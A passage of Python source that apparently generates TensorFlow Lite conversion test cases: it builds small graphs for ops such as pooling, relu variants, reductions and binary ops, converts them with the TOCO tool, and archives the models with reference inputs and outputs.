return string_util_wrapper.SerializeAsHexString(t.flatten())
def write_examples(fp, examples):
"""Given a list `examples`, write a text format representation.
The file format is csv like with a simple repeated pattern. We would ike
to use proto here, but we can't yet due to interfacing with the Android
team using this format.
Args:
fp: File-like object to write to.
examples: Example dictionary consiting of keys "inputs" and "outputs"
"""
def write_tensor(fp, x):
"""Write tensor in file format supported by TFLITE example."""
fp.write("dtype,%s\n" % x.dtype)
fp.write("shape," + ",".join(map(str, x.shape)) + "\n")
fp.write("values," + format_result(x) + "\n")
fp.write("test_cases,%d\n" % len(examples))
for example in examples:
fp.write("inputs,%d\n" % len(example["inputs"]))
for i in example["inputs"]:
write_tensor(fp, i)
fp.write("outputs,%d\n" % len(example["outputs"]))
for i in example["outputs"]:
write_tensor(fp, i)
def write_test_cases(fp, model_name, examples):
"""Given a dictionary of `examples`, write a text format representation.
The file format is protocol-buffer-like, even though we don't use proto due
to the needs of the Android team.
Args:
fp: File-like object to write to.
model_name: Filename where the model was written to, relative to filename.
examples: Example dictionary consiting of keys "inputs" and "outputs"
"""
fp.write("load_model: %s\n" % os.path.basename(model_name))
for example in examples:
fp.write("reshape {\n")
for t in example["inputs"]:
fp.write(" input: \"" + ",".join(map(str, t.shape)) + "\"\n")
fp.write("}\n")
fp.write("invoke {\n")
for t in example["inputs"]:
fp.write(" input: \"" + format_result(t) + "\"\n")
for t in example["outputs"]:
fp.write(" output: \"" + format_result(t) + "\"\n")
fp.write(" output_shape: \"" + ",".join([str(dim) for dim in t.shape]) +
"\"\n")
fp.write("}\n")
_TF_TYPE_INFO = {
tf.float32: (np.float32, "FLOAT"),
tf.float16: (np.float16, "FLOAT"),
tf.int32: (np.int32, "INT32"),
tf.uint8: (np.uint8, "QUANTIZED_UINT8"),
tf.int16: (np.int16, "QUANTIZED_INT16"),
tf.int64: (np.int64, "INT64"),
tf.bool: (np.bool, "BOOL"),
tf.string: (np.string_, "STRING"),
}
def create_tensor_data(dtype, shape, min_value=-100, max_value=100):
"""Build tensor data spreading the range [min_value, max_value)."""
if dtype in _TF_TYPE_INFO:
dtype = _TF_TYPE_INFO[dtype][0]
if dtype in (tf.float32, tf.float16):
value = (max_value-min_value)*np.random.random_sample(shape)+min_value
elif dtype in (tf.int32, tf.uint8, tf.int64, tf.int16):
value = np.random.randint(min_value, max_value+1, shape)
elif dtype == tf.bool:
value = np.random.choice([True, False], size=shape)
elif dtype == np.string_:
# Not the best strings, but they will do for some basic testing.
letters = list(string.ascii_uppercase)
return np.random.choice(letters, size=shape).astype(dtype)
return np.dtype(dtype).type(value) if np.isscalar(value) else value.astype(
dtype)
def create_scalar_data(dtype, min_value=-100, max_value=100):
"""Build scalar tensor data range from min_value to max_value exclusively."""
if dtype in _TF_TYPE_INFO:
dtype = _TF_TYPE_INFO[dtype][0]
if dtype in (tf.float32, tf.float16):
value = (max_value - min_value) * np.random.random() + min_value
elif dtype in (tf.int32, tf.uint8, tf.int64, tf.int16):
value = np.random.randint(min_value, max_value + 1)
return np.array(value, dtype=dtype)
def freeze_graph(session, outputs):
"""Freeze the current graph.
Args:
session: Tensorflow sessions containing the graph
outputs: List of output tensors
Returns:
The frozen graph_def.
"""
return tf_graph_util.convert_variables_to_constants(
session, session.graph.as_graph_def(), [x.op.name for x in outputs])
@register_make_test_function()
def make_control_dep_tests(options):
"""Make a set of tests that use control dependencies."""
test_parameters = [{
"input_shape": [[], [1, 1, 1, 1], [1, 15, 14, 1], [3, 15, 14, 3]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
filter_value = tf.zeros((3, 3, TEST_INPUT_DEPTH, 8), tf.float32)
assert_op = tf.assert_greater_equal(input_tensor, input_tensor - 1)
with tf.control_dependencies([assert_op]):
out = tf.nn.conv2d(input_tensor, filter_value,
strides=(1, 1, 1, 1), padding="SAME")
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(tf.float32, parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
extra_toco_options = ExtraTocoOptions()
extra_toco_options.drop_control_dependency = True
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
extra_toco_options,
expected_tf_failures=3)
def toco_convert(options, graph_def, input_tensors, output_tensors, **kwargs):
"""Convert a model's graph def into a tflite model.
NOTE: this currently shells out to the toco binary, but we would like
convert to Python API tooling in the future.
Args:
options: An Options instance.
graph_def: A GraphDef object.
input_tensors: List of input tensor tuples `(name, shape, type)`.
output_tensors: List of output tensors (names).
**kwargs: Extra options to be passed.
Returns:
output tflite model, log_txt from conversion
or None, log_txt if it did not convert properly.
"""
# Convert ophint ops if presented.
graph_def = tf.lite.experimental.convert_op_hints_to_stubs(
graph_def=graph_def)
graph_def_str = graph_def.SerializeToString()
extra_toco_options = kwargs.get("extra_toco_options", ExtraTocoOptions())
test_params = kwargs.get("test_params", {})
input_arrays = [x[0] for x in input_tensors]
data_types = [_TF_TYPE_INFO[x[2]][1] for x in input_tensors]
if test_params.get("fully_quantize", False):
with tempfile.NamedTemporaryFile() as graphdef_file:
graphdef_file.write(graph_def_str)
graphdef_file.flush()
input_shapes = get_input_shapes_map(input_tensors)
converter = tf.lite.TocoConverter.from_frozen_graph(
graphdef_file.name, input_arrays, output_tensors, input_shapes)
def representative_dataset(input_tensors):
calibration_inputs = []
for _, shape, _ in input_tensors:
if shape:
dims = [dim.value for dim in shape.dims]
calibration_inputs.append(
np.random.uniform(-1, 1, tuple(dims)).astype(np.float32))
return calibration_inputs
def representative_dataset_gen():
for _ in range(100):
yield representative_dataset(input_tensors)
converter.target_spec.supported_ops = [
tf.lite.OpsSet.TFLITE_BUILTINS_INT8
]
converter.representative_dataset = representative_dataset_gen
try:
tflite_model = converter.convert()
return tflite_model, ""
except Exception as e:
log = "{0}\n{1}".format(str(e), traceback.format_exc())
return None, log
else:
opts = toco_options(
data_types=data_types,
input_arrays=input_arrays,
shapes=[x[1] for x in input_tensors],
output_arrays=output_tensors,
extra_toco_options=extra_toco_options)
with tempfile.NamedTemporaryFile() as graphdef_file, \
tempfile.NamedTemporaryFile() as output_file, \
tempfile.NamedTemporaryFile("w+") as stdout_file:
graphdef_file.write(graph_def_str)
graphdef_file.flush()
# TODO(aselle): Switch this to subprocess at some point.
if "pb2lite" in bin_path and options.run_with_flex:
opts = ("--input_arrays={0} --output_arrays={1}".format(
",".join(input_arrays), ",".join(output_tensors)))
elif options.run_with_flex:
opts += " --enable_select_tf_ops --force_select_tf_ops"
cmd = ("%s --input_file=%s --output_file=%s %s > %s 2>&1" %
(bin_path, graphdef_file.name, output_file.name, opts,
stdout_file.name))
exit_code = os.system(cmd)
log = (
cmd + "exited with code %d" % exit_code + "\n------------------\n" +
stdout_file.read())
return (None if exit_code != 0 else output_file.read()), log
def get_input_shapes_map(input_tensors):
"""Gets a map of input names to shapes.
Args:
input_tensors: List of input tensor tuples `(name, shape, type)`.
Returns:
{string : list of integers}.
"""
input_arrays = [tensor[0] for tensor in input_tensors]
input_shapes_list = []
for _, shape, _ in input_tensors:
dims = None
if shape:
dims = [dim.value for dim in shape.dims]
input_shapes_list.append(dims)
input_shapes = {
name: shape
for name, shape in zip(input_arrays, input_shapes_list)
if shape
}
return input_shapes
def normalize_output_name(output_name):
"""Remove :0 suffix from tensor names."""
return output_name.split(":")[0] if output_name.endswith(
":0") else output_name
# How many test cases we may have in a zip file. Too many test cases will
# slow down the test data generation process.
_MAX_TESTS_PER_ZIP = 500
def make_zip_of_tests(options,
test_parameters,
make_graph,
make_test_inputs,
extra_toco_options=ExtraTocoOptions(),
use_frozen_graph=False,
expected_tf_failures=0):
"""Helper to make a zip file of a bunch of TensorFlow models.
This does a cartestian product of the dictionary of test_parameters and
calls make_graph() for each item in the cartestian product set.
If the graph is built successfully, then make_test_inputs() is called to
build expected input/output value pairs. The model is then converted to tflite
with toco, and the examples are serialized with the tflite model into a zip
file (2 files per item in the cartesian product set).
Args:
options: An Options instance.
test_parameters: Dictionary mapping to lists for each parameter.
e.g. `{"strides": [[1,3,3,1], [1,2,2,1]], "foo": [1.2, 1.3]}`
make_graph: function that takes current parameters and returns tuple
`[input1, input2, ...], [output1, output2, ...]`
make_test_inputs: function taking `curr_params`, `session`, `input_tensors`,
`output_tensors` and returns tuple `(input_values, output_values)`.
extra_toco_options: Additional toco options.
use_frozen_graph: Whether or not freeze graph before toco converter.
expected_tf_failures: Number of times tensorflow is expected to fail in
executing the input graphs. In some cases it is OK for TensorFlow to
fail because the one or more combination of parameters is invalid.
Raises:
RuntimeError: if there are converter errors that can't be ignored.
"""
zip_path = os.path.join(options.output_path, options.zip_to_output)
parameter_count = 0
for parameters in test_parameters:
parameter_count += functools.reduce(
operator.mul, [len(values) for values in parameters.values()])
if parameter_count > _MAX_TESTS_PER_ZIP:
raise RuntimeError(
"Too many parameter combinations for generating '%s'.\n"
"There are %d combinations while the upper limit is %d.\n"
"Having too many combinations will slow down the tests.\n"
"Please consider splitting the test into multiple functions.\n"
% (zip_path, parameter_count, _MAX_TESTS_PER_ZIP))
# TODO(aselle): Make this allow multiple inputs outputs.
archive = zipfile.PyZipFile(zip_path, "w")
zip_manifest = []
convert_report = []
toco_errors = 0
processed_labels = set()
for parameters in test_parameters:
keys = parameters.keys()
for curr in itertools.product(*parameters.values()):
label = zip_path.replace(".zip", "_") + (",".join(
"%s=%r" % z for z in sorted(zip(keys, curr))).replace(" ", ""))
if label[0] == "/":
label = label[1:]
if label in processed_labels:
# Do not populate data for the same label more than once. It will cause
# errors when unzipping.
continue
processed_labels.add(label)
param_dict = dict(zip(keys, curr))
def build_example(label, param_dict_real):
"""Build the model with parameter values set in param_dict_real.
Args:
label: Label of the model (i.e. the filename in the zip).
param_dict_real: Parameter dictionary (arguments to the factories
make_graph and make_test_inputs)
Returns:
(tflite_model_binary, report) where tflite_model_binary is the
serialized flatbuffer as a string and report is a dictionary with
keys `toco_log` (log of toco conversion), `tf_log` (log of tf
conversion), `toco` (a string of success status of the conversion),
`tf` (a string success status of the conversion).
"""
np.random.seed(RANDOM_SEED)
report = {"toco": report_lib.NOTRUN, "tf": report_lib.FAILED}
# Build graph
report["tf_log"] = ""
report["toco_log"] = ""
tf.reset_default_graph()
with tf.device("/cpu:0"):
try:
inputs, outputs = make_graph(param_dict_real)
except (tf.errors.UnimplementedError, tf.errors.InvalidArgumentError,
ValueError):
report["tf_log"] += traceback.format_exc()
return None, report
sess = tf.Session()
try:
baseline_inputs, baseline_outputs = (make_test_inputs(
param_dict_real, sess, inputs, outputs))
except (tf.errors.UnimplementedError, tf.errors.InvalidArgumentError,
ValueError):
report["tf_log"] += traceback.format_exc()
return None, report
report["toco"] = report_lib.FAILED
report["tf"] = report_lib.SUCCESS
# Convert graph to toco
input_tensors = [(input_tensor.name.split(":")[0], input_tensor.shape,
input_tensor.dtype) for input_tensor in inputs]
output_tensors = [normalize_output_name(out.name) for out in outputs]
graph_def = freeze_graph(
sess,
tf.global_variables() + inputs +
outputs) if use_frozen_graph else sess.graph_def
if "split_tflite_lstm_inputs" in param_dict_real:
extra_toco_options.split_tflite_lstm_inputs = param_dict_real[
"split_tflite_lstm_inputs"]
tflite_model_binary, toco_log = options.tflite_convert_function(
options,
graph_def,
input_tensors,
output_tensors,
extra_toco_options=extra_toco_options,
test_params=param_dict_real)
report["toco"] = (report_lib.SUCCESS if tflite_model_binary is not None
else report_lib.FAILED)
report["toco_log"] = toco_log
if True or options.save_graphdefs:
archive.writestr(label + ".pbtxt",
text_format.MessageToString(graph_def),
zipfile.ZIP_DEFLATED)
if tflite_model_binary:
archive.writestr(label + ".bin", tflite_model_binary,
zipfile.ZIP_DEFLATED)
example = {"inputs": baseline_inputs, "outputs": baseline_outputs}
example_fp = StringIO()
write_examples(example_fp, [example])
archive.writestr(label + ".inputs",
example_fp.getvalue(), zipfile.ZIP_DEFLATED)
example_fp2 = StringIO()
write_test_cases(example_fp2, label + ".bin", [example])
archive.writestr(label + "_tests.txt",
example_fp2.getvalue(), zipfile.ZIP_DEFLATED)
zip_manifest.append(label + "\n")
return tflite_model_binary, report
_, report = build_example(label, param_dict)
if report["toco"] == report_lib.FAILED:
ignore_error = False
if not options.known_bugs_are_errors:
for pattern, bug_number in options.known_bugs.items():
if re.search(pattern, label):
print("Ignored converter error due to bug %s" % bug_number)
ignore_error = True
if not ignore_error:
toco_errors += 1
print("-----------------\nconverter error!\n%s\n-----------------\n" %
report["toco_log"])
convert_report.append((param_dict, report))
report_io = StringIO()
report_lib.make_report_table(report_io, zip_path, convert_report)
archive.writestr("report.html", report_io.getvalue())
archive.writestr("manifest.txt", "".join(zip_manifest), zipfile.ZIP_DEFLATED)
# Log statistics of what succeeded
total_conversions = len(convert_report)
tf_success = sum(1 for x in convert_report
if x[1]["tf"] == report_lib.SUCCESS)
toco_success = sum(1 for x in convert_report
if x[1]["toco"] == report_lib.SUCCESS)
percent = 0
if tf_success > 0:
percent = float(toco_success) / float(tf_success) * 100.
tf.logging.info(("Archive %s Considered %d graphs, %d TF evaluated graphs "
" and %d TOCO converted graphs (%.1f%%"), zip_path,
total_conversions, tf_success, toco_success, percent)
tf_failures = parameter_count - tf_success
if tf_failures / parameter_count > 0.8:
raise RuntimeError(("Test for '%s' is not very useful. "
"TensorFlow fails in %d percent of the cases.") %
(zip_path, int(100 * tf_failures / parameter_count)))
if tf_failures != expected_tf_failures:
raise RuntimeError(("Expected TF to fail %d times while generating '%s', "
"but that happened %d times") % (expected_tf_failures,
zip_path, tf_failures))
if not options.ignore_converter_errors and toco_errors > 0:
raise RuntimeError(
"Found %d errors while generating toco models" % toco_errors)
def make_pool_tests(pool_op_in):
"""Make a set of tests to do average pooling.
Args:
pool_op_in: TensorFlow pooling operation to test i.e. `tf.nn.avg_pool2d`.
Returns:
A function representing the true generator (after curried pool_op_in).
"""
pool_op = pool_op_in
def f(options, expected_tf_failures=0):
"""Actual function that generates examples.
Args:
options: An Options instance.
expected_tf_failures: number of expected tensorflow failures.
"""
# Chose a set of parameters
test_parameters = [{
"ksize": [[2, 1, 1, 2], [1, 1, 1, 1], [1, 1, 2, 1], [1, 10, 11, 1]],
"strides": [[2, 1, 1, 2], [1, 1, 1, 1], [1, 1, 2, 1], [1, 10, 11, 1]],
# TODO(aselle): should add in a degenerate shape (e.g. [1, 0, 1, 1]).
"input_shape": [[], [1, 1, 1, 1], [1, 15, 14, 1], [3, 15, 14, 3]],
"padding": ["SAME", "VALID"],
"data_format": ["NHWC"], # TODO(aselle): NCHW would be good
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = pool_op(
input_tensor,
ksize=parameters["ksize"],
strides=parameters["strides"],
data_format=parameters["data_format"],
padding=parameters["padding"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(tf.float32, parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=expected_tf_failures)
return f
@register_make_test_function()
def make_l2_pool_tests(options):
make_pool_tests(make_l2_pool)(options, expected_tf_failures=80)
@register_make_test_function()
def make_avg_pool_tests(options):
make_pool_tests(tf.nn.avg_pool)(options, expected_tf_failures=80)
@register_make_test_function()
def make_max_pool_tests(options):
make_pool_tests(tf.nn.max_pool)(options, expected_tf_failures=80)
@register_make_test_function()
def make_abs_tests(options):
"""Make a set of tests to do relu."""
# Chose a set of parameters
test_parameters = [{
"input_shape": [[], [1], [2, 3], [1, 1, 1, 1], [1, 3, 4, 3],
[3, 15, 14, 3], [3, 1, 2, 4, 6], [2, 2, 3, 4, 5, 6]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.abs(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-10, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_elu_tests(options):
"""Make a set of tests to do (float) tf.nn.elu."""
test_parameters = [
{
"input_shape": [[], [1], [2, 3], [1, 1, 1, 1], [1, 3, 4, 3],
[3, 15, 14, 3], [3, 1, 2, 4, 6], [2, 2, 3, 4, 5, 6]],
},
]
def build_graph(parameters):
"""Build the graph for the test case."""
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.nn.elu(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Build the inputs for the test case."""
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-4, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_identity_tests(options):
"""Make a set of tests to do identity."""
# Chose a set of parameters
test_parameters = [{
"input_shape": [[], [1], [3, 3]],
"use_snapshot": [False, True],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
# We add the Multiply before Identity just as a walk-around to make the test
# pass when input_shape is scalar.
# During graph transformation, TOCO will replace the Identity op with
# Reshape when input has shape. However, currently TOCO can't distinguish
# between missing shape and scalar shape. As a result, when input has scalar
# shape, this conversion still fails.
# TODO(b/129197312), remove the walk-around code once the bug is fixed.
input_doubled = input_tensor * 2.0
if parameters["use_snapshot"]:
identity_output = array_ops.snapshot(input_doubled)
else:
identity_output = tf.identity(input_doubled)
return [input_tensor], [identity_output]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-4, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_relu_tests(options):
"""Make a set of tests to do relu."""
# Chose a set of parameters
test_parameters = [{
"input_shape": [[], [1], [2, 3], [1, 1, 1, 1], [1, 3, 4, 3],
[3, 15, 14, 3], [3, 1, 2, 4, 6], [2, 2, 3, 4, 5, 6]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.nn.relu(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-4, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_relu1_tests(options):
"""Make a set of tests to do relu1."""
# Chose a set of parameters
test_parameters = [{
"input_shape": [[], [1, 1, 1, 1], [1, 3, 4, 3], [3, 15, 14, 3],
[3, 1, 2, 4, 6], [2, 2, 3, 4, 5, 6]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
# Note that the following is not supported:
# out = tf.maximum(-1.0, tf.minimum(input_tensor, 1.0))
out = tf.minimum(1.0, tf.maximum(input_tensor, -1.0))
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-3, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_relu6_tests(options):
"""Make a set of tests to do relu6."""
# Chose a set of parameters
test_parameters = [{
"input_shape": [[], [1, 1, 1, 1], [1, 3, 4, 3], [3, 15, 14, 3],
[3, 1, 2, 4, 6], [2, 2, 3, 4, 5, 6]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.nn.relu(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-3, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_prelu_tests(options):
"""Make a set of tests to do PReLU."""
test_parameters = [
{
# The canonical case for image processing is having a 4D `input`
# (NHWC)and `shared_axes`=[1, 2], so the alpha parameter is per
# channel.
"input_shape": [[1, 10, 10, 3], [3, 3, 3, 3]],
"shared_axes": [[1, 2], [1]],
},
{
# 2D-3D example. Share the 2nd axis.
"input_shape": [[20, 20], [20, 20, 20]],
"shared_axes": [[1]],
}
]
def build_graph(parameters):
"""Build the graph for the test case."""
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
prelu = tf.keras.layers.PReLU(shared_axes=parameters["shared_axes"])
out = prelu(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Build the inputs for the test case."""
input_shape = parameters["input_shape"]
input_values = create_tensor_data(
np.float32, input_shape, min_value=-10, max_value=10)
shared_axes = parameters["shared_axes"]
alpha_shape = []
for dim in range(1, len(input_shape)):
alpha_shape.append(1 if dim in shared_axes else input_shape[dim])
alpha_values = create_tensor_data(np.float32, alpha_shape)
# There should be only 1 trainable variable tensor.
variables = tf.all_variables()
assert len(variables) == 1
sess.run(variables[0].assign(alpha_values))
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
use_frozen_graph=True)
@register_make_test_function()
def make_leaky_relu_tests(options):
"""Make a set of tests to do LeakyRelu."""
test_parameters = [
{
"input_shape": [[], [1], [5], [1, 10, 10, 3], [3, 3, 3, 3]],
"alpha": [0.1, 1.0, 2.0, -0.1, -1.0, -2.0],
},
]
def build_graph(parameters):
"""Build the graph for the test case."""
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.nn.leaky_relu(input_tensor, alpha=parameters["alpha"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Build the inputs for the test case."""
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-3, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
# This function tests various TensorFLow functions that generates Const op,
# including `tf.ones`, `tf.zeros` and random functions.
@register_make_test_function()
def make_constant_tests(options):
"""Make a set of tests to do constant ops."""
test_parameters = [{
"dtype": [tf.float32, tf.int32],
"input_shape": [[], [1], [2], [1, 1, 1, 1], [2, 2, 2, 2]],
"constant_is_also_output": [True, False],
# This is a regression test for a bug where Toco rejects models with
# unread inputs.
"has_unread_input": [True, False],
}]
def build_graph(parameters):
dummy_input = tf.placeholder(
dtype=parameters["dtype"],
name="input1",
shape=parameters["input_shape"])
constant = tf.constant(
create_tensor_data(parameters["dtype"], parameters["input_shape"]))
outputs = [tf.maximum(dummy_input, constant)]
if parameters["constant_is_also_output"]:
outputs.append(constant)
inputs = [dummy_input]
if parameters["has_unread_input"]:
unread_input = tf.placeholder(
dtype=parameters["dtype"],
name="unread_input",
shape=parameters["input_shape"])
inputs.append(unread_input)
return inputs, outputs
def build_inputs(parameters, sess, inputs, outputs):
dummy_input = np.zeros(
parameters["input_shape"], dtype=_TF_TYPE_INFO[parameters["dtype"]][0])
return [dummy_input], sess.run(outputs, feed_dict={inputs[0]: dummy_input})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
def make_binary_op_tests(options, binary_operator, expected_tf_failures=0):
"""Make a set of tests to do binary ops with and without broadcast."""
test_parameters = [
# Avoid creating all combinations to keep the test size small.
{
"dtype": [tf.float32, tf.int32],
"input_shape_1": [[1, 3, 4, 3]],
"input_shape_2": [[1, 3, 4, 3]],
"activation": [True],
},
{
"dtype": [tf.float32],
"input_shape_1": [[5]],
"input_shape_2": [[5]],
"activation": [False, True],
},
{
"dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_1": [[1, 3, 4, 3]],
"input_shape_2": [[3]],
"activation": [True, False],
},
{
"dtype": [tf.float32, tf.int32],
"input_shape_1": [[3]],
"input_shape_2": [[1, 3, 4, 3]],
"activation": [True, False],
},
{
"dtype": [tf.float32],
"input_shape_1": [[]],
"input_shape_2": [[]],
"activation": [False],
},
{
"dtype": [tf.float32],
"input_shape_1": [[0]],
"input_shape_2": [[1]],
"activation": [False],
}
]
def build_graph(parameters):
"""Builds the graph given the current parameters."""
input1 = tf.placeholder(
dtype=parameters["dtype"],
name="input1",
shape=parameters["input_shape_1"])
input2 = tf.placeholder(
dtype=parameters["dtype"],
name="input2",
shape=parameters["input_shape_2"])
out = binary_operator(input1, input2)
if parameters["activation"]:
out = tf.nn.relu(out)
return [input1, input2], [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Builds operand inputs for op."""
input1 = create_tensor_data(parameters["dtype"],
parameters["input_shape_1"])
input2 = create_tensor_data(parameters["dtype"],
parameters["input_shape_2"])
return [input1, input2], sess.run(
outputs, feed_dict={
inputs[0]: input1,
inputs[1]: input2
})
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=expected_tf_failures)
def make_reduce_tests(reduce_op,
min_value=-10,
max_value=10,
boolean_tensor_only=False):
"""Make a set of tests to do reduce operation.
Args:
reduce_op: TensorFlow reduce operation to test, i.e. `tf.reduce_mean`.
min_value: min value for created tensor data.
max_value: max value for created tensor data.
boolean_tensor_only: If true, will only generate tensor with boolean value.
Returns:
a function representing the true generator with `reduce_op_in` curried.
"""
def f(options):
"""Actual function that generates examples."""
test_parameters = [
{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape": [[3, 3, 2, 4]],
"axis": [
0, 1, 2, [0, 1], [0, 2], [1, 2], [0, 1, 2], [1, 0], [2, 0],
[2, 1], [2, 1, 0], [2, 0, 1], -1, -2, -3, [1, -1], [0, -1],
[-1, 0], [-1, -2, -3], [0, 0, 0], [2, 2, 0], [1, 0, -3, -3]
],
"const_axis": [True, False],
"keepdims": [True, False],
},
{
"input_dtype": [tf.float32],
"input_shape": [[1, 8, 8, 3]],
"axis": [
0, 1, 2, 3, [1, 2], [0, 3], [1, 2, 3], [0, 1, 2,
3], [3, 2, 1, 0],
[3, 1, 0, 2], [2, 0], [3, 0], [3, 1], [1, 0], -1, -2, -3, -4,
[0, -2], [2, 3, -1, 0], [3, 1, 2, -3], [3, -4], [2, 2, 2],
[2, 2, 3], [-3, -3, -4], [-3, 2, 1]
],
"const_axis": [True, False],
"keepdims": [True, False],
},
{
"input_dtype": [tf.float32],
"input_shape": [[], [1, 8, 8, 3], [3, 2, 4]],
"axis": [[]], # shape is: [0]
"const_axis": [False],
"keepdims": [True, False],
},
{
"input_dtype": [tf.float32],
"input_shape": [[], [1, 8, 8, 3], [3, 2, 4]],
"axis": [None], # shape is: []
"const_axis": [True],
"keepdims": [True, False],
}
]
def build_graph(parameters):
"""Build the mean op testing graph."""
dtype = parameters["input_dtype"]
if boolean_tensor_only:
dtype = tf.bool
input_tensor = tf.placeholder(
dtype=dtype, name="input", shape=parameters["input_shape"])
# Get axis as either a placeholder or constants.
if parameters["const_axis"]:
axis = parameters["axis"]
input_tensors = [input_tensor]
else:
if isinstance(parameters["axis"], list):
shape = [len(parameters["axis"])]
else:
shape = [] # shape for None or integers.
axis = tf.placeholder(dtype=tf.int32, name="axis", shape=shape)
input_tensors = [input_tensor, axis]
out = reduce_op(
input_tensor, axis=axis, keepdims=parameters["keepdims"])
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
dtype = parameters["input_dtype"]
if boolean_tensor_only:
dtype = tf.bool
values = [
create_tensor_data(
dtype,
parameters["input_shape"],
min_value=min_value,
max_value=max_value)
]
if not parameters["const_axis"]:
values.append(np.array(parameters["axis"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
return f
@register_make_test_function()
def make_mean_tests(options):
"""Make a set of tests to do mean."""
return make_reduce_tests(tf.reduce_mean)(options)
@register_make_test_function()
def make_sum_tests(options):
"""Make a set of tests to do sum."""
return make_reduce_tests(tf.reduce_sum)(options)
@register_make_test_function()
def make_reduce_prod_tests(options):
"""Make a set of tests to do prod."""
# set min max value to be -2, 2 to avoid overflow.
return make_reduce_tests(tf.reduce_prod, -2, 2)(options)
@register_make_test_function()
def make_reduce_max_tests(options):
"""Make a set of tests to do max."""
return make_reduce_tests(tf.reduce_max)(options)
@register_make_test_function()
def make_reduce_min_tests(options):
"""Make a set of tests to do min."""
return make_reduce_tests(tf.reduce_min)(options)
@register_make_test_function()
def make_reduce_any_tests(options):
"""Make a set of tests to do any."""
return make_reduce_tests(tf.reduce_any, boolean_tensor_only=True)(options)
@register_make_test_function()
def make_exp_tests(options):
"""Make a set of tests to do exp."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[], [3], [1, 100], [4, 2, 3], [5, 224, 224, 3]],
}]
def build_graph(parameters):
"""Build the exp op testing graph."""
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.exp(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["input_dtype"], parameters["input_shape"],
min_value=-100, max_value=9)
]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_cos_tests(options):
